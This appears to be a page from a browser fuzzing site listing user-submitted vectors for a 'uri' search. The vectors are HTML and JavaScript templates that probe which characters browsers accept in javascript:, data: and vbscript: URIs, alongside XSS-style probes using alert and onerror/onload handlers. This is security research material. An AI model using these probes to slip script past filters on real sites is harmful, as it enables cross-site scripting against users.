Featured vector

No vectors found in the last 30 days

Fuzz vector cloud

5,457,354 Successful fuzzes

Fuzz Vectors

Searching for "uri"

Your browser identified as

General Crawlers unknown

All vectors

Description Vector Created by
Data URI What can replace the in data <script src="data*chr*,log(*num*)"></script> @skeptic_fx
charecter between two URI <a href="http://*chr*javascript:alert(1)">testxss</a> @Mramydnei
Characters not encoded with encodeURIComponent <script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script> @garethheyes
Characters not encoded with encodeURI <script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script> @garethheyes
Determine what character can be at the end of the javascript but before the colon <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:alert(*num*)>*num*</a> @MisterJyu
Characters allowed after uri host "`'/><img/onload=log(*num*) src="http://shazzer.co.uk*chr*/favicon.ico"/> @jackmasa
Characters not encoded by encodeURIComponent <script> if ('*uni*' === encodeURIComponent('*uni*')) { log(*num*); } </script> @shafigullin
Characters not encoded by encodeURI <script> if ('*uni*' === encodeURI('*uni*')) { log(*num*); } </script> @shafigullin
Characters allowed for padding in a VBS URI 002 <iframe src="vbscript:log*chr**num*"></iframe> @0x6D6172696F
Characters allowed for padding in a VBS URI 001 <iframe src="vbs:log*chr**num*"></iframe> @0x6D6172696F
Characters allowed for padding in a data URI 003 <script src="data:text/plain*chr*log(*num*)"></script> @0x6D6172696F
Characters allowed for padding in a data URI 002 <script src="data:*chr*,log(*num*)"></script> @0x6D6172696F
Characters allowed for padding in a data URI 001 <script src="data:text/plain,lo*chr*g(*num*)"></script> @0x6D6172696F